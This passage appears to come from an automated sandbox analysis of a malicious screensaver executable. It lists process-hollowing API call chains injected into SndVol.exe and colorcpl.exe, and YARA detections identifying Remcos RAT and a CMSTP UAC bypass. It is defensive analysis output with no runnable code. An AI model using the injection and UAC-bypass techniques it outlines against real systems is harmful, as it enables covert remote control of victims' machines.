                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05368DBC CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_05368DBC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05363F9F OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,3_2_05363F9F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536C802 OpenProcess,NtResumeProcess,CloseHandle,3_2_0536C802
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004016FD NtdllDefWindowProc_A,7_2_004016FD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004017B7 NtdllDefWindowProc_A,7_2_004017B7
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02918170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02918170
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004167B4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05367481 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_05367481
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029020C40_2_029020C4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0043E0CC3_2_0043E0CC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041F0FA3_2_0041F0FA
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004541593_2_00454159
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004381683_2_00438168
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004461F03_2_004461F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0043E2FB3_2_0043E2FB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0045332B3_2_0045332B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0042739D3_2_0042739D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004374E63_2_004374E6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0043E5583_2_0043E558
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004387703_2_00438770
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004378FE3_2_004378FE
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004339463_2_00433946
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0044D9C93_2_0044D9C9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00427A463_2_00427A46
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041DB623_2_0041DB62
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00427BAF3_2_00427BAF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00437D333_2_00437D33
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00435E5E3_2_00435E5E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00426E0E3_2_00426E0E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0043DE9D3_2_0043DE9D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00413FCA3_2_00413FCA
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00436FEA3_2_00436FEA
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535114A3_2_0535114A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053885CB3_2_053885CB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538943D3_2_0538943D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053787133_2_05378713
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053846133_2_05384613
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0539E6963_2_0539E696
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053881B33_2_053881B3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0537806A3_2_0537806A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538F2253_2_0538F225
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538ED993_2_0538ED99
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536FDC73_2_0536FDC7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05387CB73_2_05387CB7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05364C973_2_05364C97
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053A3FF83_2_053A3FF8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538EFC83_2_0538EFC8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05388E353_2_05388E35
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053A4E263_2_053A4E26
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05396EBD3_2_05396EBD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536E82F3_2_0536E82F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0537887C3_2_0537887C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05386B2B3_2_05386B2B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0538EB6A3_2_0538EB6A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05388A003_2_05388A00
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05377ADB3_2_05377ADB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6CB5C13_2_1E6CB5C1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6D71943_2_1E6D7194
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044B0404_2_0044B040
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0043610D4_2_0043610D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004473104_2_00447310
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044A4904_2_0044A490
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040755A4_2_0040755A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0043C5604_2_0043C560
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044B6104_2_0044B610
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044D6C04_2_0044D6C0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004476F04_2_004476F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044B8704_2_0044B870
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044081D4_2_0044081D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004149574_2_00414957
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004079EE4_2_004079EE
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00407AEB4_2_00407AEB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044AA804_2_0044AA80
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00412AA94_2_00412AA9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00404B744_2_00404B74
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00404B034_2_00404B03
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0044BBD84_2_0044BBD8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00404BE54_2_00404BE5
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00404C764_2_00404C76
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00415CFE4_2_00415CFE
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00416D724_2_00416D72
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00446D304_2_00446D30
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00446D8B4_2_00446D8B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00406E8F4_2_00406E8F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004050387_2_00405038
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0041208C7_2_0041208C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004050A97_2_004050A9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0040511A7_2_0040511A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0043C13A7_2_0043C13A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004051AB7_2_004051AB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004493007_2_00449300
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0040D3227_2_0040D322
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0044A4F07_2_0044A4F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0043A5AB7_2_0043A5AB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004136317_2_00413631
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004466907_2_00446690
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0044A7307_2_0044A730
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004398D87_2_004398D8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_004498E07_2_004498E0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0044A8867_2_0044A886
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0043DA097_2_0043DA09
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00438D5E7_2_00438D5E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00449ED07_2_00449ED0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_0041FE837_2_0041FE83
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00430F547_2_00430F54
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00434E10 appears 54 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0538543D appears 41 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05352B32 appears 35 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00434770 appears 41 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05385ADD appears 54 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00401E65 appears 35 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: String function: 029046A4 appears 244 times
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: String function: 0290480C appears 771 times
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: String function: 029044AC appears 69 times
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: String function: 02917DF4 appears 45 times
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: String function: 02917CA8 appears 49 times
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe
                    Source: HGTQP09643009.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
